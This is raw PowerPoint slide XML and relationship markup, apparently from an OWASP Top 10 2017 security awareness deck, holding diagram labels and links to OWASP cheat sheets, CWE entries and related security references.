                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="275" y="1757"/>
                  <a:ext cx="0" cy="2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Shape 58"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="131" y="1997"/>
                  <a:ext cx="144" cy="19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Shape 59"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="275" y="1997"/>
                  <a:ext cx="144" cy="19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Shape 60"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="131" y="1853"/>
                  <a:ext cx="288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" name="Shape 61"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr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45700" rIns="36000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8421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Threat</a:t>
                </a:r>
                <a:b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Agents</a:t>
                </a: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114300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Attack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Vectors</a:t>
                </a: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Security</a:t>
                </a:r>
                <a:b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Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="64" name="Shape 64"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="62" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1981200" y="1257553"/>
                <a:ext cx="838200" cy="480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rgbClr val="463F90"/>
                </a:solidFill>
                <a:prstDash val="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65" name="Shape 65"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="62" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="685800" y="1256353"/>
                <a:ext cx="457200" cy="1200"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 52974"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="463F90"/>
                </a:solidFill>
                <a:prstDash val="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66" name="Shape 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr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rgbClr val="DFDEF0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sz="9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rgbClr val="DFDEF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68" name="Shape 68"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="63" idx="3"/>
              <a:endCxn id="54" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="3899845" y="1251434"/>
              <a:ext cx="15867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463F90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588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865716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DD2-27F9-4966-B34E-DF3AF7EF07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3200" b="1" spc="-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4859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474720" y="6400800"/>
            <a:ext cx="3383280" cy="274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>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40005" dist="22860" dir="5400000" algn="ctr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lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="44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371600" y="76199"/>
            <a:ext cx="5486400" cy="762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7142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Exo 2"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Shape 21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>
          <a:ext cx="6861600" cy="210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-6350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App. Specific</a:t>
                      </a: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6350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 ?</a:t>
                      </a:r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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="274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3168000"/>
            <a:ext cx="3383280" cy="315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474720" y="3168000"/>
            <a:ext cx="3383280" cy="315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1BE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rgbClr val="83276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1">
                <a:solidFill>
                  <a:srgbClr val="4A164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>
              <a:solidFill>
                <a:srgbClr val="4A16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24248" y="1058047"/>
            <a:ext cx="6071752" cy="390006"/>
            <a:chOff x="24248" y="1058047"/>
            <a:chExt cx="6071752" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Shape 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1058047"/>
              <a:ext cx="6071752" cy="386519"/>
              <a:chOff x="24248" y="1070390"/>
              <a:chExt cx="6071752" cy="386519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5486400" y="1070390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Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="29" name="Shape 29"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr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30" name="Shape 30"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr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endParaRPr sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="dk1"/>
                    </a:solidFill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cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="31" name="Shape 31"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="275" y="1757"/>
                  <a:ext cx="0" cy="2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 flipH="1">
                  <a:off x="131" y="1997"/>
                  <a:ext cx="144" cy="19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275" y="1997"/>
                  <a:ext cx="144" cy="19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31" y="1853"/>
                  <a:ext cx="288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63F9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" name="Shape 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr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45700" rIns="36000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8421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Threat</a:t>
                </a:r>
                <a:b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Agents</a:t>
                </a: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14300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Attack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Vectors</a:t>
                </a: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Security</a:t>
                </a:r>
                <a:b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50" b="1">
                    <a:solidFill>
                      <a:srgbClr val="2F2A6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Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="Shape 38"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="36" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1981200" y="1257553"/>
                <a:ext cx="838200" cy="480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rgbClr val="463F90"/>
                </a:solidFill>
                <a:prstDash val="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39" name="Shape 39"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="36" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="685800" y="1256353"/>
                <a:ext cx="457200" cy="1200"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 52974"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="463F90"/>
                </a:solidFill>
                <a:prstDash val="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40" name="Shape 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr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rgbClr val="DFDEF0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sz="9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rgbClr val="DFDEF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42" name="Shape 42"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="37" idx="3"/>
              <a:endCxn id="28" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="3899845" y="1251434"/>
              <a:ext cx="15867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463F90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1800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owasp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Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2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we.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html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owasp.org/index.php/ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon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XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools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owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack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Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties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www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639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www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tool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Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External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ww.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16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www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmark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DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Projec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developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79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502.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/friday-the-13th-json-attac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akerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec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hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories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github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="Externa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Heartbleed" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.ph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csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;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owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Projec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Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project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www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.N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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASV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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" 